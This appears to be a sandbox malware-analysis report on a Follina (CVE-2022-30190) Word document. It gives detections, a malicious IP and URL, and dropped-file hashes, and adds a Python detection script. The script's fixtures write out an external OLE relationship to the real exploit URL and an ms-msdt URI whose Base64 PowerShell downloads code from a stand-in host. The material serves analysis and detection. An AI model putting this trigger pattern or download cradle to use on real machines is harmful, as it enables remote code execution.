Analysis Report (Windows): ZDhoKQk8G6.docx

Overview / General Information

Detection
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |

Signatures / Classification
- System is w7x64
- WINWORD.EXE (PID: 828, cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
- cleanup
Yara hits on the initial sample

Rule | Description | Author |
---|---|---|
SUSP_Doc_WordXMLRels_May22 | Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard, Wojciech Cieslak |
INDICATOR_OLE_RemoteTemplate | Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents | ditekSHen |

Yara hits on dropped files (the downloaded exploit.htm and its Office/IE cache copies; the source lists the two rules once per copy and truncates the remaining entries)

Rule | Description | Author |
---|---|---|
EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
Snort IDS alerts (all inbound from 117.48.146.246:8008 to the sandbox host 192.168.2.22)

Timestamp | SID | Classtype | Source Port | Destination Port | Protocol |
---|---|---|---|---|---|
06/15/22-07:10:36.033223 | 2023942 | A Network Trojan was detected | 8008 | 49178 | TCP |
06/15/22-07:10:36.033223 | 2036726 | Attempted User Privilege Gain | 8008 | 49178 | TCP |
06/15/22-07:10:36.033223 | 2023941 | A Network Trojan was detected | 8008 | 49178 | TCP |
06/15/22-07:10:38.181098 | 2023941 | A Network Trojan was detected | 8008 | 49181 | TCP |
06/15/22-07:10:38.181098 | 2023942 | A Network Trojan was detected | 8008 | 49181 | TCP |
06/15/22-07:10:38.181098 | 2036726 | Attempted User Privilege Gain | 8008 | 49181 | TCP |
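The two detections the report rests on (an external OLE relationship in word/_rels/document.xml.rels, then an ms-msdt: URI carrying a Base64 PowerShell payload in the HTML that Word fetched) can be reproduced offline with the following Python. This is an added example; it is not part of the Joe Sandbox report and does not copy the strings of the cited Yara or ET rules. The .docx and the HTML it scans are constructed inside the script: the relationship target mimics the URL from this report, the PowerShell hidden in the Base64 only references the non-resolving host example.invalid, and the trailing "!" heuristic and the 4 KiB HTML-size threshold are assumptions modelled on public write-ups of Follina.

```python
"""Follina-style (CVE-2022-30190) maldoc triage.

Stage 1: external relationships in word/_rels/document.xml.rels of the
kinds Word resolves on open (the SUSP_Doc_WordXMLRels / RemoteTemplate idea).
Stage 2: ms-msdt: URI plus decoded Base64 PowerShell in the fetched HTML
(the EXPL_Follina and ET 2036726 / 2023941 / 2023942 idea).
The docx and HTML below are constructed fixtures, not the report's files.
"""
import base64
import binascii
import io
import re
import xml.etree.ElementTree as ET
import zipfile

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
SUSPICIOUS_REL_TYPES = ("oleObject", "attachedTemplate")  # hyperlinks excluded on purpose
PS_MARKERS = ("WebClient", "DownloadString", "Invoke-Expression", "FromBase64String")
MSDT_ID_RE = re.compile(r"ms-msdt:/id\s+(\w+)", re.IGNORECASE)
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def build_sample_docx() -> bytes:
    """Minimal OOXML package with one external oleObject relationship (constructed)."""
    rels = (
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{REL_BASE}styles" Target="styles.xml"/>'
        f'<Relationship Id="rId2" Type="{REL_BASE}oleObject" '
        'Target="http://117.48.146.246:8008/exploit.htm!" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


def build_sample_html() -> str:
    """Constructed stand-in for exploit.htm: filler (assumed 4 KiB threshold), then an
    ms-msdt: URI whose parameter carries Base64 of UTF-16LE PowerShell."""
    cmd = "(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
    blob = base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")
    filler = "<!-- " + "filler " * 700 + "-->"
    return (
        "<!doctype html><html><body>" + filler + "<script>"
        'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force '
        '/param \\"IT_BrowseForFile=' + blob + '\\"";</script></body></html>'
    )


def external_relationships(docx_bytes: bytes) -> list:
    """Relationships in document.xml.rels that point outside the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if "word/_rels/document.xml.rels" not in z.namelist():
            return findings
        root = ET.fromstring(z.read("word/_rels/document.xml.rels"))
    for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
        if rel.get("TargetMode") != "External":
            continue
        rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
        if rel_type not in SUSPICIOUS_REL_TYPES:
            continue
        target = rel.get("Target", "")
        findings.append({
            "id": rel.get("Id"), "type": rel_type, "target": target,
            # Trailing "!" is the Follina idiom that makes Word render the reply as
            # HTML; a heuristic assumed from public analyses, not a rule string.
            "bang_suffix": target.endswith("!"),
            "over_http": target.lower().startswith("http://"),
        })
    return findings


def decode_blob(blob: str) -> str:
    """Base64-decode; choose UTF-16LE when the odd bytes are NUL (encoded-command style)."""
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    if raw and len(raw) % 2 == 0 and not any(raw[1:40:2]):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def scan_html(html: str) -> dict:
    """Flag the ms-msdt: diagnostic id, the IT_BrowseForFile parameter, the padding,
    and any Base64 blob that decodes to PowerShell download code."""
    decoded = []
    for blob in B64_RE.findall(html):
        try:
            text = decode_blob(blob)
        except (binascii.Error, ValueError):
            continue
        hits = [m for m in PS_MARKERS if m.lower() in text.lower()]
        if hits:
            decoded.append({"markers": hits, "preview": text[:72]})
    return {
        "msdt_ids": MSDT_ID_RE.findall(html),
        "browse_for_file": "IT_BrowseForFile" in html,
        "padded": len(html) >= 4096,
        "decoded_powershell": decoded,
    }


def triage(docx_bytes: bytes, html: str) -> str:
    rels = external_relationships(docx_bytes)
    page = scan_html(html)
    if rels and page["msdt_ids"] and page["decoded_powershell"]:
        return "follina-chain"
    return "remote-relationship" if rels else "clean"


if __name__ == "__main__":
    print(external_relationships(build_sample_docx()))
    print(scan_html(build_sample_html()))
    print(triage(build_sample_docx(), build_sample_html()))
```

Run it against a real sample by passing the document bytes and the body the sandbox captured (here the Content.IE5 copy of exploit[1].htm) instead of the two fixtures; the stage-1 check alone is what the SUSP_Doc_WordXMLRels_May22 hit on the original document corresponds to, and stage 2 is what fires on the downloaded HTML.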
Signature overview (counts of evidence rows per signature type; the evidence text itself is not in this extract)

AV Detection
- Virustotal (perma link): 1 | ReversingLabs: 1

Exploits
- File source: 5 | Extracted files from sample: 1 | File opened: 1 | TCP traffic: 2

Networking
- Snort IDS: 6 | Network traffic detected: 18 | HTTP traffic detected: 6 | TCP traffic: 1 | ASN Name: 1 | TCP traffic detected without corresponding DNS query: 50 | String found in binary or memory: 6 | File created: 1

System Summary
- Matched rule: 8 | OLE stream indicators for Word, Excel, PowerPoint, and Visio: 1 | Virustotal: 1 | ReversingLabs: 1 | LNK file: 1 | File created: 2 | Classification label: 1 | OLE document summary: 3 | File read: 1 | Window detected: 1 | Key opened: 1 | File opened: 1 | Initial sample: 1

Persistence and Installation Behavior
- Extracted files from sample: 1

Hooking and other Techniques for Hiding and Protection
- Network traffic detected: 18 | Process information set: 65
MITRE ATT&CK techniques with matched signatures (number in parentheses is the count of signatures mapped to the technique; the remaining cells of the source matrix were unmatched template entries)

- Execution: Exploitation for Client Execution (12)
- Defense Evasion: Masquerading (1)
- Discovery: File and Directory Discovery (1); System Information Discovery (1)
- Command and Control: Non-Standard Port (11); Non-Application Layer Protocol (2); Application Layer Protocol (12); Ingress Tool Transfer (4)
Antivirus detection

Source | Detection | Scanner | Label |
---|---|---|---|
| 25% | Virustotal | |
| 17% | ReversingLabs | Script-Macro.Exploit.CVE-2017-0199 |
Contacted domains / URLs (names not present in this extract)

Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| false | | high |
| false | | high |
| false | | high |

Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
117.48.146.246 | unknown | China | 4837 | CHINA169-BACKBONE China Unicom China169 Backbone, CN | true |
Joe Sandbox Version: | 35.0.0 Citrine |
Analysis ID: | 645905 |
Start date and time: | 2022-06-15 07:09:28 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 20s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | ZDhoKQk8G6.docx |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 5 |
Number of new started drivers analysed: | 1 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal84.troj.expl.evad.winDOCX@1/22@0/1 |
EGA Information: | Failed |
HDC Information: | Failed |
Cookbook Comments:
- Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
- TCP Packets have been reduced to 100
- Report size getting too big, too many NtQueryAttributesFile calls found.
- Report size getting too big, too many NtSetValueKey calls found.
Dropped files (22, all written by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; entries without a path heading had none in this extract)

Four of the cache files carry the same content (5982 bytes, MD5 7F4B47B5BE4DF743220DDA8F5595909A): the download of http://117.48.146.246:8008/exploit.htm under Content.IE5\XNHC0JWC, a second IE cache copy under Content.IE5\ZAE7RW1P, and two Office cache copies under Content.MSO. Three of the four are flagged Malicious with Yara hits; the ZAE7RW1P copy is not, although it is byte-identical, so triage and blocking should key on the hash rather than on the per-path verdict.

(path not recorded)
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.2885388677374342 |
Encrypted: | false |
SSDEEP: | 48:I3oocnRBcAVFKPR2ais0luP2N2E9hrQZq46xbATxbA7H:Ko9LjKvP2N2E99Qt6x0Tx07H |
MD5: | C86FDD1688DFA14188A34E2FA613D252 |
SHA1: | EE12F352A8EB013ACD680EAF77177F590D8E1799 |
SHA-256: | 92FE284561709E189C7A95D753BFFDFE5EA788C48E0AFC642FF8ACF4E886EB17 |
SHA-512: | 5AD00B55C195FBA1AFB83648429FB964AF0E76DDB399BA47A3D4E8F56F6D7507A0B8C665C262C7A546093BB5AE31849744FFA2D6BF498CBF110979D82E3DCF65 |
Malicious: | false |
Reputation: | low |

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{2A40B0AC-ACBB-463B-8DC0-568E01ED388D}.FSD
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.6757902642554773 |
Encrypted: | false |
SSDEEP: | 96:K46Cy3egKDtc1r5vztDz3IdoG9oU8MC+1T0HQYGS:z6WDe1rxhhGjm+uw |
MD5: | D97F2CC70A4379260D06D56554D15338 |
SHA1: | AA791DEB8BDE74815AD14F492E808E3BE2CA33DB |
SHA-256: | C16B2099208C3E92051AE581D68C48EACE6C2676FA3D0294C11CFFA4D1296B76 |
SHA-512: | BF551EBCA42DADD9EFA9D10EECAA907F2B8ABF67DD5F10AFCB5AF98FD226C19848A26AEF80E744592D45AD2A411075008964879CF33DC8E31B0796293BA8DB01 |
Malicious: | false |
Reputation: | low |

(path not recorded)
Category: | dropped |
Size (bytes): | 114 |
Entropy (8bit): | 3.939953768708169 |
Encrypted: | false |
SSDEEP: | 3:yVlgsRlz8JllVXIlsSllILmnSBSYQJldOJ7lWldFk276:yPblzQwlsSHIKSBS9cJAlk22 |
MD5: | 23C72AAF923FE6C7EA713BC3B6BABE8D |
SHA1: | 81BE16213DBADA2C88789E63AB577C51035F3D02 |
SHA-256: | 8B119C83E768575DBDAB4CA4C43A5036600340D9D73CA253A000D4EE91651620 |
SHA-512: | 6177F0BDA0D261F5E566137684A750695E9E62B7AE514E1FA9C74E5C78A83BBE6B5DD975BEB907F56BF625C9AC8F1E531952C5EBF6B68E0169C0A64E4612AB75 |
Malicious: | false |
Reputation: | low |

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.28920165154806665 |
Encrypted: | false |
SSDEEP: | 48:I3NRBK1cjGmLVnNyw5T5iYlbxQ/rJmAS5REAS5RLH:KNLNJxQTJTotoLH |
MD5: | 5D8DC4451C809A7288A70F0310BAFB79 |
SHA1: | 9BB56FEF0EC78307F10DCE7E9C75C353A8312CC5 |
SHA-256: | 4A7FDAD115C3C0982E5200F719C349B7F6C95415B35FF7ED9B18A4DFD6CFA143 |
SHA-512: | DE9B179EDB9C7D520F1C0AD968B1BA6F29C483CFEBB91A826C66CA1CD78ACEE277756E0FB4B66490534EDBB81BEAFAF97A7FF8B132BABC9DD6AE4FB0A0AB6E27 |
Malicious: | false |
Reputation: | low |

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{4FD4A456-B142-48A7-8A26-7CC29A810637}.FSD
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.22189153735687875 |
Encrypted: | false |
SSDEEP: | 48:I3mEMRUrB1alSOwjXq7mdS/BVDIW6fbfzIssfbr1q3oDq3ok:KmRRCftjsJqQs8bM |
MD5: | 7453904A6FC41F31B5CF58B64E84E111 |
SHA1: | 525EB1FFC638888B18CC1DF87D46B1B7B11E51C9 |
SHA-256: | 5E68DD6840E40B8DEC61403C1C786857E02A22A05C399B941B13CED14BFC3A4D |
SHA-512: | E8D8AFDF2243BDEDCDFBB45DE3FAA0999A870DF34776F34E4D12E4AAA00700FB8A747AA1A1949FA3955759150407B6C85304E888E70FF4364FD02BECC5BE551C |
Malicious: | false |
Reputation: | low |

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
Category: | dropped |
Size (bytes): | 114 |
Entropy (8bit): | 3.9660980668778723 |
Encrypted: | false |
SSDEEP: | 3:yVlgsRlzF6R+UOLNvIWnsZ3lMp0276:yPblzkUZIWrp022 |
MD5: | E435FF41580D4AF52534CED5213A06DE |
SHA1: | D9D9501DB59405B4BD62FECC2C67AF0DA7B80AFE |
SHA-256: | 8C91DC89D9CC105BB8B3BA9CA0A156FC559EAD5A5C8546D86D6F3BDFEB14ED1B |
SHA-512: | F7C65AB2F7331A78093B2E73B425F8253A97EE32E3CAF150F880F2FAEC7C06F8E1F3EADC74E13D7E6BAFD9FE54A70DFE4BBF89B5C7A4B518B8981F1EE3670233 |
Malicious: | false |
Reputation: | low |

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exploit[1].htm
Category: | downloaded |
Size (bytes): | 5982 |
Entropy (8bit): | 4.758638141931997 |
Encrypted: | false |
SSDEEP: | 96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gN:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiG |
MD5: | 7F4B47B5BE4DF743220DDA8F5595909A |
SHA1: | 5B7E7EEA20DE3F9C89D7FF3CF21E256D0EE00E54 |
SHA-256: | 2CDD875B905065D9E35E323EB56F8F5B1DCA141BE94DA35F79DAF833D88728A7 |
SHA-512: | E09214CCA66CDA3B0A0120985B19B029C7DA40A560DB9D0E8C80EE2F0988E655A5C452F8A1553BD5A86918EC2C92FBE622AFDA82302277C18CA839DC4321A6CB |
Malicious: | true |
Yara Hits: |
Reputation: | low |
IE Cache URL: | http://117.48.146.246:8008/exploit.htm |

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\exploit[1].htm
Category: | dropped |
Size (bytes): | 5982 |
Entropy (8bit): | 4.758638141931997 |
Encrypted: | false |
SSDEEP: | 96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gN:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiG |
MD5: | 7F4B47B5BE4DF743220DDA8F5595909A |
SHA1: | 5B7E7EEA20DE3F9C89D7FF3CF21E256D0EE00E54 |
SHA-256: | 2CDD875B905065D9E35E323EB56F8F5B1DCA141BE94DA35F79DAF833D88728A7 |
SHA-512: | E09214CCA66CDA3B0A0120985B19B029C7DA40A560DB9D0E8C80EE2F0988E655A5C452F8A1553BD5A86918EC2C92FBE622AFDA82302277C18CA839DC4321A6CB |
Malicious: | false |
Reputation: | low |

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\722BFA5.htm
Category: | dropped |
Size (bytes): | 5982 |
Entropy (8bit): | 4.758638141931997 |
Encrypted: | false |
SSDEEP: | 96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gN:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiG |
MD5: | 7F4B47B5BE4DF743220DDA8F5595909A |
SHA1: | 5B7E7EEA20DE3F9C89D7FF3CF21E256D0EE00E54 |
SHA-256: | 2CDD875B905065D9E35E323EB56F8F5B1DCA141BE94DA35F79DAF833D88728A7 |
SHA-512: | E09214CCA66CDA3B0A0120985B19B029C7DA40A560DB9D0E8C80EE2F0988E655A5C452F8A1553BD5A86918EC2C92FBE622AFDA82302277C18CA839DC4321A6CB |
Malicious: | true |
Yara Hits: |
Reputation: | low |

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7341AC3F.htm
Category: | dropped |
Size (bytes): | 5982 |
Entropy (8bit): | 4.758638141931997 |
Encrypted: | false |
SSDEEP: | 96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gN:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiG |
MD5: | 7F4B47B5BE4DF743220DDA8F5595909A |
SHA1: | 5B7E7EEA20DE3F9C89D7FF3CF21E256D0EE00E54 |
SHA-256: | 2CDD875B905065D9E35E323EB56F8F5B1DCA141BE94DA35F79DAF833D88728A7 |
SHA-512: | E09214CCA66CDA3B0A0120985B19B029C7DA40A560DB9D0E8C80EE2F0988E655A5C452F8A1553BD5A86918EC2C92FBE622AFDA82302277C18CA839DC4321A6CB |
Malicious: | true |
Yara Hits: |

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B14BFC0.png
Category: | dropped |
Size (bytes): | 251976 |
Entropy (8bit): | 7.994452839001206 |
Encrypted: | true |
SSDEEP: | 6144:Y0ai6s7Sg8tWib0g5m+yHcsgiFi5XGfJsZ9Or4:Y0b1w0llHcsgnXKazOr4 |
MD5: | DFC62C64626F11E01A29203C6BFAC296 |
SHA1: | E418EF6561DDC24CD62D47ED131713B922871363 |
SHA-256: | 2C71BFD99AD8A748954CC840174C3851386001F40312D2B8956019801357B2F1 |
SHA-512: | A9B568AA135D67F3E2DEEAFACB137EF3EDBC09095214EDF49810EA2736DF60FD3D10067BBE42126F60018C5C9284ABF08B1A1719EE06471F72B003E5BF58F437 |
Malicious: | false |

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F20135FB.png
Category: | dropped |
Size (bytes): | 184356 |
Entropy (8bit): | 7.989908339576132 |
Encrypted: | false |
SSDEEP: | 3072:jUKT4LKebSEdyKTPq2ElM4wHU5YDv4QUYKoxkX0gg4HS+NcqGTtji1f+2Z+pyl3/:wzLKebS0hzqnM4wHguUYJxWvqD8P+slP |
MD5: | C02C455F5D77DF5AE8B9F638C8EF8854 |
SHA1: | F3F8C9A5C20DABDD1FE99D05197F6D11BA9484AF |
SHA-256: | 5E07AC7BFE2C65429ACDBD281C0E9B92F5A382E4FFF699741E8D085F7EAD17DE |
SHA-512: | 10FBE8D48F22E26250206B84F2C4D3220C8E8FDC622FD33576A796856CFAAA467F6D5F9DD87AFE9DE242FB8EEA27F6E13A743B8231F932FF494E88C710EC86F9 |
Malicious: | false |

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{365EE8EB-26DD-4793-A79E-4CD05254F7C9}.tmp
Category: | dropped |
Size (bytes): | 6144 |
Entropy (8bit): | 2.193154020020311 |
Encrypted: | false |
SSDEEP: | 24:rOheRLp07US2GRXhR1iUtbtE1sR1i72GRXhbhMi72GRXI:riD24X1iS51i724Vqi724 |
MD5: | 47DE66F0D409B5DCA1C5A74F93197E3B |
SHA1: | E2F2B6C4C25C531C9247509D900D09FAFFD7CCC3 |
SHA-256: | BDBF2FA4C228CB0038E3D3D5D63BE3D445C1CF19774AC7F7BAB5B31CD3DECDBD |
SHA-512: | 4755E1DBE64B77022440CFA730204DC9CDD7D34558CA98F428315A008E7B72498A55445BB1B4C8D5F24F2C19C6592EE09FA15DFD301A5CD3926C9D0F5387731C |
Malicious: | false |

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0F1199C9-FFD7-4240-8F04-53D52631A074}.tmp
Category: | dropped |
Size (bytes): | 2 |
Entropy (8bit): | 1.0 |
Encrypted: | false |
SSDEEP: | 3:X:X |
MD5: | 32649384730B2D61C9E79D46DE589115 |
SHA1: | 053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4 |
SHA-256: | E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB |
SHA-512: | A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C |
Malicious: | false |

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E3D2E09D-939E-4CE8-8CEF-3005BD062461}.tmp
Category: | dropped |
Size (bytes): | 2828 |
Entropy (8bit): | 5.711486827536375 |
Encrypted: | false |
SSDEEP: | 48:I90P62VCDYx0Y59VYCG+stp0//PWZmVx77K5Y1VWMqDJQ/nbp0:ImlZz5nY+8IBEJQTp0 |
MD5: | 985DDD0B25EBF55AE27458B1235FCEC6 |
SHA1: | 5DB27EE086681CA58169ED02A82333A4CCC2466B |
SHA-256: | 678804E2C39F405A132A2CFC4DAC2A4855F10A98137C28CE6D3ABEACB2C7CB7B |
SHA-512: | 7668711CEBBD48C7E15905105477DB8D3EB292FCAEB7E15CDC3B689BE3DED9B83A3C420A66ED6BFBA860B51737985F08948D7D6837CC7CC27E2F210C09FC88FC |
Malicious: | false |

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F2A88E0D-A9AE-4C78-97ED-928ECF332904}.tmp
Category: | dropped |
Size (bytes): | 1024 |
Entropy (8bit): | 0.05390218305374581 |
Encrypted: | false |
SSDEEP: | 3:ol3lYdn:4Wn |
MD5: | 5D4D94EE7E06BBB0AF9584119797B23A |
SHA1: | DBB111419C704F116EFA8E72471DD83E86E49677 |
SHA-256: | 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 |
SHA-512: | 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4 |
Malicious: | false |

(path not recorded)
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.0255932170100285 |
Encrypted: | false |
SSDEEP: | 6:I3DPc1x60FvxggLRj6Aj0+lpRXv//4tfnRujlw//+GtluJ/eRuj:I3DPkxbpPvg+1vYg3J/ |
MD5: | AB727153D355FCB89A4DD0F778DB5504 |
SHA1: | 88523811C7F9B235D6FE4B601E4C9DDB8070A72F |
SHA-256: | 56EF8D395A20E46295410DD854C67EE2AE49AFBDFF5F2D2EB27CA9A16481AA3C |
SHA-512: | 1594340344098975785F846B957888FB93E1FFC0F3A8EABC95834645C8D758F80AEB33BA4630C4F307A64F98ACAF8176C9BE9207C8744375C4560FFB2151C20B |
Malicious: | false |

(path not recorded)
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.025545224349082966 |
Encrypted: | false |
SSDEEP: | 6:I3DPcrRvxggLR9QI+vAZ+pRXv//4tfnRujlw//+GtluJ/eRuj:I3DPypQI+HHvYg3J/ |
MD5: | 8B61E4E8242D0961EA9025B656A013E6 |
SHA1: | 0A9C2887993588A0BA822A3F2159F8615CD6482B |
SHA-256: | 3D97D4A53F94F3D859C0488F5B3DB1C7177DC575485332BD693B3D6F7D53D98E |
SHA-512: | 3EE33B89CB9A6F36DADADADE7DA78826ADAAC65AF69A021D8F9C48E3E9CCAF16125EB6141D75B8277F907A5861D64B95B0745FCE2DF676160F9FDC8FB47C6292 |
Malicious: | false |

(path not recorded)
Category: | dropped |
Size (bytes): | 1019 |
Entropy (8bit): | 4.5762421575069645 |
Encrypted: | false |
SSDEEP: | 12:81l80gXg/XAlCPCHaXBKBnB/xQpX+WAclGaiEazjuicvb8X9M804TazNDtZ3Yil2:8Ak/XTRKJIKdthNeqM8aDv3qdwY7h |
MD5: | 32CF2F9FC38195E95F72206961AE587C |
SHA1: | B9A93790175F263CA9264FE176C7A3939CE1E7C3 |
SHA-256: | D0AE07AF5C7F3745B60A89DE69F01D6039DCB11BA2357D20B4D17688D21DEB7B |
SHA-512: | A38940EEE57924015DA87622A835B6BDFB60BE4C71CFA17E54634A52C5AAD58FC02711539DAFEF8DFC6591593F19487AC120F965F77AAFF9D2A97A2C9FC9AF00 |
Malicious: | false |

(path not recorded)
Category: | dropped |
Size (bytes): | 72 |
Entropy (8bit): | 4.824535814767059 |
Encrypted: | false |
SSDEEP: | 3:bDuMJlntd+pruYVomxW0hNxd+pruYVov:bCstMj7xMjy |
MD5: | 0B27580E2EF503551637D1B2B325B07C |
SHA1: | B861428A3D29FD19167867B18E7C5A6B1C052F9B |
SHA-256: | 85D83675D7ADE632A4EE881D9F2C48C3B5AC1A4698800DB416BBACA7346FB2EB |
SHA-512: | D8AF0CA7BE5345689B8ED4D26D64079E98EB75507FC41735464A85E449B70E8432B21F2ED0224A0B92F9B3616BFAF4C05AF7B0AA14ED23A810FA7EBF9F11E104 |
Malicious: | false |

(path not recorded; two dropped files with identical content, listed once)
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.4797606462020303 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl |
MD5: | 1674A1C7C99CD9FAADA789F5E2AEB335 |
SHA1: | 26D9E81D5ED584A899A94D5EA8945A5AE3403F85 |
SHA-256: | BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6 |
SHA-512: | B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C |
Malicious: | false |
File type: | |
Entropy (8bit): | 7.994153126444351 |
TrID: |
File name: | ZDhoKQk8G6.docx |
File size: | 449949 |
MD5: | b64108b4dbb4cc0ceeca091289d3c3e6 |
SHA1: | ad1eb7107e76f8d75cdb2c3a8cc39179dd490ef0 |
SHA256: | 52b48c4b2f4a63fc6611dea7e9146a440d41e306143788ea20c56c3ab292cf00 |
SHA512: | e3446e893cedc19a6b3dfb931d830f8467139f418fc851c47f638974dfe665cac8bea6decb5f15e087a9eb1a5c5bb59c63e4606f8f55b5ed1171ec4aed22d905 |
SSDEEP: | 12288:LMLNbEnsH8SUY8ceFl3b0tZ80HxVcsg/DKkxOIB:gRbEnsH8AeFlr0tFRVcsMKkJB |
TLSH: | 10A423E102FAA020F6B1095377D3230769414A7EB8B5438DCE2B765F54E37E896B24CD |
File Content Preview: | PK...........T....]...R.......[Content_Types].xml...j.0.E.....6.J.(.....e.h...4vD.BR^..Q..........{....p..*[.......>..p+..K.=}..H."3.)k.$..d<...N7.B.j.J2..=S...4..u`.RY.Y.W_S.....>....[...<&.2..B..*fok\nH..I......H..i..TxPaO..S...u.4b.+.1......t...G.R.x.N |
Icon Hash: | e4e6a2a2a4b4b4a4 |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
06/15/22-07:10:36.033223 | TCP | 2023942 | ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M2 | 8008 | 49178 | 117.48.146.246 | 192.168.2.22 |
06/15/22-07:10:36.033223 | TCP | 2036726 | ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) | 8008 | 49178 | 117.48.146.246 | 192.168.2.22 |
06/15/22-07:10:36.033223 | TCP | 2023941 | ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M1 | 8008 | 49178 | 117.48.146.246 | 192.168.2.22 |
